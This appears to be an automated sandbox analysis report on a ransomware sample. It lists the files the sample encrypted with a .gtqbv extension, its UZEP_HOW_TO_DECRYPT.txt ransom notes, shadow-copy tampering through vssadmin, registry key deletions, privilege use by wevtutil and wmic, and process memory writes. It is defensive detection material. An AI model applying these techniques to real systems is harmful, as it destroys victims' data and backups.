File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\js\nls\en-gb\UZEP_HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe N/A
File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsMaps_5.1611.10393.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\Images\Ratings\Yelp10.scale-125.png C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\contrast-white\HxA-Google.scale-150.png C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\images\rhp_world_icon_2x.png.2VAIVLFKv_4GLaLl21fzqVyW-VTNC4xNQNdudWpX0YX_B4fV07mzxCg0.gtqbv C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-netbeans-api-search.jar.2VAIVLFKv_4GLaLl21fzqVyW-VTNC4xNQNdudWpX0YX_UOvNbNwq5o80.gtqbv C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\LogoImages\WinWordLogo.contrast-black_scale-80.png.2VAIVLFKv_4GLaLl21fzqVyW-VTNC4xNQNdudWpX0YX_qkwP53lpx2o0.gtqbv C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.NET.Native.Runtime.1.3_1.3.23901.0_x64__8wekyb3d8bbwe\AppxMetadata\CodeIntegrity.cat C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\9724_32x32x32.png C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\pages-app\css\main-selector.css.2VAIVLFKv_4GLaLl21fzqVyW-VTNC4xNQNdudWpX0YX_n9a3hJdIgoY0.gtqbv C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\app-center\js\nls\ja-jp\UZEP_HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\themes\dark\UZEP_HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Colors\Blue Warm.xml.2VAIVLFKv_4GLaLl21fzqVyW-VTNC4xNQNdudWpX0YX_j2HElbCr5SM0.gtqbv C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\root\ui-strings.js.2VAIVLFKv_4GLaLl21fzqVyW-VTNC4xNQNdudWpX0YX_Iaz-9TRol3I0.gtqbv C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\ja-jp\ui-strings.js.2VAIVLFKv_4GLaLl21fzqVyW-VTNC4xNQNdudWpX0YX_9sIhJ0140r00.gtqbv C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\ca-es\UZEP_HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\sdxhelper.exe.manifest.2VAIVLFKv_4GLaLl21fzqVyW-VTNC4xNQNdudWpX0YX_1Al0WQGMmg40.gtqbv C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe N/A
File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.ZuneMusic_10.16112.11621.0_neutral_resources.scale-200_8wekyb3d8bbwe\AppxBlockMap.xml C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.metadata.repository.nl_ja_4.4.0.v20140623020002.jar.2VAIVLFKv_4GLaLl21fzqVyW-VTNC4xNQNdudWpX0YX_oGPL38MByOE0.gtqbv C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\HowToPlay\FreeCell\Goal_7.jpg C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\HxCalendarAppList.targetsize-36.png C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\VisioProVL_MAK-ppd.xrm-ms.2VAIVLFKv_4GLaLl21fzqVyW-VTNC4xNQNdudWpX0YX_wvUsnGebhz40.gtqbv C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\MSIPC\ro\msipc.dll.mui.2VAIVLFKv_4GLaLl21fzqVyW-VTNC4xNQNdudWpX0YX_tE1h17QVtMs0.gtqbv C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\en-il\ui-strings.js.2VAIVLFKv_4GLaLl21fzqVyW-VTNC4xNQNdudWpX0YX_-_HS7GWYlfw0.gtqbv C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-modules-applemenu_ja.jar.2VAIVLFKv_4GLaLl21fzqVyW-VTNC4xNQNdudWpX0YX_Vrv7wWnNw400.gtqbv C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\GRAPH_K_COL.HXK.2VAIVLFKv_4GLaLl21fzqVyW-VTNC4xNQNdudWpX0YX_KQvVeO5VBSw0.gtqbv C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\contrast-white\OneNoteAppList.targetsize-24_altform-unplated.png C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Designs\Flags\large\iq_60x42.png C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.Windows.Photos_16.511.8780.0_x64__8wekyb3d8bbwe\Assets\PhotosAppList.targetsize-96_altform-unplated.png C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\en-il\UZEP_HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\ThemeCreation\commoneffects.respack C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\js\nls\de-de\ui-strings.js.2VAIVLFKv_4GLaLl21fzqVyW-VTNC4xNQNdudWpX0YX_SJKjiktM3Ko0.gtqbv C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\et.txt.2VAIVLFKv_4GLaLl21fzqVyW-VTNC4xNQNdudWpX0YX_5nlfuxSw0NM0.gtqbv C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\O365SmallBusPremR_Subscription1-pl.xrm-ms.2VAIVLFKv_4GLaLl21fzqVyW-VTNC4xNQNdudWpX0YX_qU9RjIGOuA40.gtqbv C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe N/A
File opened for modification C:\Program Files\Windows Media Player\de-DE\wmpnssci.dll.mui C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\pt-br\ui-strings.js.2VAIVLFKv_4GLaLl21fzqVyW-VTNC4xNQNdudWpX0YX_cBWX7Rp_DaA0.gtqbv C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\plugins\rhp\UZEP_HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\sl-si\UZEP_HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-snaptracer_zh_CN.jar.2VAIVLFKv_4GLaLl21fzqVyW-VTNC4xNQNdudWpX0YX_RLyM7WhFzcE0.gtqbv C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_x64__8wekyb3d8bbwe\Assets\SecondaryTiles\Car\RTL\contrast-black\WideTile.scale-200.png C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.XboxApp_25.25.13009.0_x64__8wekyb3d8bbwe\Assets\NavigationIcons\nav_icons_gameDVR.targetsize-48.png C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe N/A
File opened for modification C:\Program Files\Common Files\System\msadc\de-DE\msadcer.dll.mui.2VAIVLFKv_4GLaLl21fzqVyW-VTNC4xNQNdudWpX0YX_GKfBMYJ7vrA0.gtqbv C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe N/A
File opened for modification C:\Program Files\Internet Explorer\es-ES\iexplore.exe.mui C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Integration\C2RManifest.Word.Word.x-none.msi.16.x-none.xml.2VAIVLFKv_4GLaLl21fzqVyW-VTNC4xNQNdudWpX0YX_kYKM4n8iRio0.gtqbv C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe N/A
File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsMaps_5.1611.10393.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\AppTiles\MapsSplashScreen.scale-125.png C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe N/A

Launches sc.exe

Interacts with shadow copies

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\vssadmin.exe N/A

Modifies registry class

Description Indicator Process Target
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\EPP C:\Windows\SysWOW64\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\EPP C:\Windows\SysWOW64\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\ContextMenuHandlers\EPP C:\Windows\SysWOW64\reg.exe N/A

Opens file in notepad (likely ransom note)

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\notepad.exe N/A

Runs net.exe

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\wevtutil.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 36 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: 36 N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\wmic.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3328 wrote to memory of 1816 N/A C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe C:\Windows\SysWOW64\net.exe
PID 3328 wrote to memory of 1816 N/A C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe C:\Windows\SysWOW64\net.exe
PID 3328 wrote to memory of 1816 N/A C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe C:\Windows\SysWOW64\net.exe
PID 1816 wrote to memory of 3404 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1816 wrote to memory of 3404 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1816 wrote to memory of 3404 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 3328 wrote to memory of 3408 N/A C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe C:\Windows\SysWOW64\net.exe
PID 3328 wrote to memory of 3408 N/A C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe C:\Windows\SysWOW64\net.exe
PID 3328 wrote to memory of 3408 N/A C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe C:\Windows\SysWOW64\net.exe
PID 3408 wrote to memory of 3340 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 3408 wrote to memory of 3340 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 3408 wrote to memory of 3340 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 3328 wrote to memory of 1912 N/A C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe C:\Windows\SysWOW64\net.exe
PID 3328 wrote to memory of 1912 N/A C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe C:\Windows\SysWOW64\net.exe
PID 3328 wrote to memory of 1912 N/A C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe C:\Windows\SysWOW64\net.exe
PID 1912 wrote to memory of 4272 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1912 wrote to memory of 4272 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1912 wrote to memory of 4272 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 3328 wrote to memory of 4180 N/A C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe C:\Windows\SysWOW64\net.exe
PID 3328 wrote to memory of 4180 N/A C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe C:\Windows\SysWOW64\net.exe
PID 3328 wrote to memory of 4180 N/A C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe C:\Windows\SysWOW64\net.exe
PID 4180 wrote to memory of 816 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 4180 wrote to memory of 816 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 4180 wrote to memory of 816 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 3328 wrote to memory of 4332 N/A C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe C:\Windows\SysWOW64\net.exe
PID 3328 wrote to memory of 4332 N/A C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe C:\Windows\SysWOW64\net.exe
PID 3328 wrote to memory of 4332 N/A C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe C:\Windows\SysWOW64\net.exe
PID 4332 wrote to memory of 4420 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 4332 wrote to memory of 4420 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 4332 wrote to memory of 4420 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 3328 wrote to memory of 4296 N/A C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe C:\Windows\SysWOW64\net.exe
PID 3328 wrote to memory of 4296 N/A C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe C:\Windows\SysWOW64\net.exe
PID 3328 wrote to memory of 4296 N/A C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe C:\Windows\SysWOW64\net.exe
PID 4296 wrote to memory of 4460 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 4296 wrote to memory of 4460 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 4296 wrote to memory of 4460 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 3328 wrote to memory of 3208 N/A C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe C:\Windows\SysWOW64\net.exe
PID 3328 wrote to memory of 3208 N/A C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe C:\Windows\SysWOW64\net.exe
PID 3328 wrote to memory of 3208 N/A C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe C:\Windows\SysWOW64\net.exe
PID 3208 wrote to memory of 4500 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 3208 wrote to memory of 4500 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 3208 wrote to memory of 4500 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 3328 wrote to memory of 1800 N/A C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe C:\Windows\SysWOW64\net.exe
PID 3328 wrote to memory of 1800 N/A C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe C:\Windows\SysWOW64\net.exe
PID 3328 wrote to memory of 1800 N/A C:\Users\Admin\AppData\Local\Temp\2f0944e818cdf3f006a5b25ea2c39a2a7c914682a2653c60f22e971f3d84c709.exe C:\Windows\SysWOW64\net.exe
PID 1800 wrote to memory of 432 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1800 wrote to memory of 432 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
PID 1800 wrote to memory of 432 N/A C:\Windows\SysWOW64\net.exe C:\Windows\SysWOW64\net1.exe
